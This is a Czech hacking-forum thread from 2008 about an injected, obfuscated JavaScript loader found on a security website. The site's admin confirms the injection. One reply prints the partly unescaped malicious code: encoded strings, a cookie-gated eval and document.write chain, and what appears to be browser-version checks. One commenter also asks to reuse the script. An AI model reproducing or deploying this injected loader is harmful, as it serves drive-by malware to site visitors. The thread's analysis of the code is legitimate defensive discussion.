Co to zkouší na SP?

HackForum

Co to zkouší na SP?#
Při dnešní návštěvě stránky skola.security-portal.cz na mě antivir zařval, že stránka obsahuje malware VBS:Malware-gen.
Ve zdrojovém kódu stránky je skutečně podezřelý javascript umístěn na jejím samém konci. Po jeho prvním unescapování jsem obdržel řadu proměnných, které se v dalším kroku znovu unescapují, ale bohužel tam chybí proměnná "dz", takže jsem to dál nezkoumal. Pokud se někdo chcete podívat blíže a zjistit, co to skola.security-portal.cz na uživatele zkouší, dejte pak vědět. Případně by mohl odpovědět třeba i RubberDuck o co tu jde. Celkem by mě to zajímalo.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP15.7.2008 18:00
re: Co to zkouší na SP?#
.cCuMiNn. Ja tam nic nevidim :)
(odpovědět)
_( | )_ | 85.132.197.*15.7.2008 21:49
re: Co to zkouší na SP?#
jj, už to tam není...

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP15.7.2008 22:37
re: Co to zkouší na SP?#
megahek
(odpovědět)
~c | 213.19.63.*16.7.2008 10:46
re: Co to zkouší na SP?#
co k tomu říct?
(odpovědět)
Shaiiiiii | 81.92.146.*16.7.2008 11:55
re: Co to zkouší na SP?#
ňeco takovýho se teď objeví na eSPéčku..že se je snažíš pošpinit.NyQ
(odpovědět)
Co zkouší .cCoMiNn.? | 78.156.129.*16.7.2008 13:44
re: Co to zkouší na SP?#
Čekám na vyjádření RubberDucka. Snad se tu ukáže a trochu to objasní :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP16.7.2008 13:46
re: Co to zkouší na SP?#
Vyse zminovany JS kod na strance #skola projektu skutecne byl. Ovsem ne dele nez par dnu (max. dva). Ke zbytku se zatim nijak nemuzu vyjadrit i kdyz mam nektera podezreni. Timto se vsem omlouvam za pripadne problemy, ktere mohly diky tomuto problemu v pripade navstevniku vzniknout.
(odpovědět)
RubberDuck. | 85.71.165.*16.7.2008 14:02
re: Co to zkouší na SP?#
kdyz se vam to nelibi tak proc tam lezete kreteni
(odpovědět)
&box[]= | 213.84.233.136/192.168.8.*16.7.2008 17:23
re: Co to zkouší na SP?#
kdo rekl, ze se nam to nelibi? Primitive..

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail16.7.2008 18:06
re: Co to zkouší na SP?#
Sákriš, ty jseš ale drsňák. Nejsi náhodou ze SP? :D Tam to je taky samej drsňák, ale jinak tam je duto =)
(odpovědět)
_( | )_ | 85.132.197.*16.7.2008 19:59
re: Co to zkouší na SP?#
A co to bol za javascript ?!?!?!?!?!?!?!?! hodil by sa mi :-)

(odpovědět)
Beinger | 78.98.251.*16.7.2008 18:08
re: Co to zkouší na SP?#
Tady je kód po prvním escapování:

db="<7`7<7a7<7b7<7c7<7d7<
7e7<7f7<7g7<7h7<7i7<7j79+fqb
0~)-~ug0Q
bbqi8!<%22<#<$<%<%26<'<
;(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu
89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wud
Tqi89.#9d)K7t7M-t)>wudTqd
u89=8t)>wudT";

dd="iSx%22<}Sx<}^}+yv8d)K7i7M,%22%20%
20'9kd)K7i7M0-0%22%20%20'
+m}^}-S]^8d)K7t7M<=obuf4}gKqzuvxqp4)4rux
gq/}r4<5c}zp{c:{dqfu42
245zub}su`{f:w{{%7F}qQzuvxqp=fq`afz4}gKqzuv
xqp/}r4<`mdq{r4p{wa
yqz`:w{{%7F}q4))43g`f}zs3=}r4<{rrgq`45)4
9%=o{rrgq`4?)4gqufw|:x
qzs`|/qzp4)4w{{%7F}q:}zpql[r<6/684{rrgq`
=/}r4<{rrgq`84qzp==/ii
fq`afz<=obuf4d{dKczp4)46|``d.;;rvwyr}f:w
{y;ws}9v}z;}zpql:ws}+p
l6/buf4rquKczp4)46gwf{xxvufg)%8fqg}nuvxq)%8
`{{xvuf)%8x{wu`}{z)
%8yqzavuf)%8g`u`ag)%8p}fqw`{f}qg)$6/buf4zqq
pK{dqz4)4`faq/}r4<=
/}r4<=/}r4<5d{dKazpqf:wx{gqp=zqqpK{dq
z4)4ruxgq/i}r4<==obux4)4d
{dKsq`W{{%7F}q<=/bux%264)4zqc4Pu`q<=8
4z{c:sq`Y{z`|<=84z{c:sq`P
u`q<=84z{c:sq`%5C{afg<=84z{c:sq`Y}za`
qg<=84z{c:sq`Gqw{zpg<==/a
`w%264)4Pu`q:A@W<=84bux%26:sq`Y{z`|<=
84bux%26:sq`Pu`q<=84bux%2
6:sq`%5C{afg<=84bux%26:sq`Y}za`qg<=84
bux%26:sq`Gqw{zpg<==/}r4<
4<4a`w'%26494a`w%264=4;4%$$$4(4d{dK`}yq{
a`>%22$=ozqqpK{dqz4)4r
uxgq/iiii}r4<=/c}zp{c:r{wag<=/}r4<
==oz{c4)4zqc4Pu`q<=/d{dKgq`W
{{%7F}q<=obuf4bqf4)4dufgqRx{u`<6C}zp{
cg4-!6=*)$4hh4zub}su`{f:a
gqfUsqz`:}zpql[r<6C}zp{cg4-,6=*)$4hh4zub
}su`{f:agqfUsqz`:}zpql
[r<6C}zp{cg4Z@6=*)$4=22<3[dqfu3=4))49
%=22<3YG]Q3=4*49%=422<3GB
%3=4*49%=422bu`|qsu8ts%7F}79+";

dc="qi89;%229+u|cu0d)K7t7M-t)>wudTqdu89=
8t)>wudTqi899+yv8d)K7t
7M,%209d)K7t7M-!+d)K7}7M-t)>wud]%7F~dx89
;!+ve~sdy%7F~0S]^8t<}s
%7F}7+fqb0iSx!<";

cz="%66u%6ec%74i%6fn %63z%28%63%7a)%7bret%75rn%20c%61%2b%63%62
%2bc%63+%63%64+c%65+c%7a;}%3b";

da="fqb0})-~ug0Qbbqi87|qe~%7F7<7{rtfu7&l
t;7zsdxb7<7ytvyb7<7xufyv7
<7wvhuc7<7vwfuc7<7uxwxd7<7tzu~y
7<7s{ud~7<7r||uf7<7q}dgu79+fqb0
|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u
7<7v7<7w7<7x7<7y7<7z7<7{7
<7|7<7
}7<7~7<7%7F7";

ca="%66%75nc%74%69o%6e%20dcs%28ds%2ce%73)%7
bds%3dun%65s%63ap";

ce="%61%72Co%64e%41t(%30)^%28%270x0%30%27+e
s%29%29);}%7d";

op="%24%3d%22dw(d%63%73(cu%2c14)%29;%22;";

st="%73t%3d%22$%3ds%74%3b%64c%73%28%64a%2b%
64%62%2b%64%63+%64%
64%2b%64e%2c1%30%29;%64w%28%73t%29%3bs%74%3
d%24;%22;";

if (document.cookie.indexOf('vbulletin_multiqu
ote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+'dw(dz+cz($+st))
;')
}
else
{$=''};
function sc(cnm,v,ed){var exd=new Date();
exd.setDate(exd.getDate()+ed);document.cook
ie=cnm+ '=' +escape(v)+';
expires='+exd.toGMTString();
};


----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP16.7.2008 18:28
re: Co to zkouší na SP?#
Drsneee ale super dky :-D
(odpovědět)
Beinger | 78.98.252.*17.7.2008 14:09

Zpět
 
 
 

 
BBCode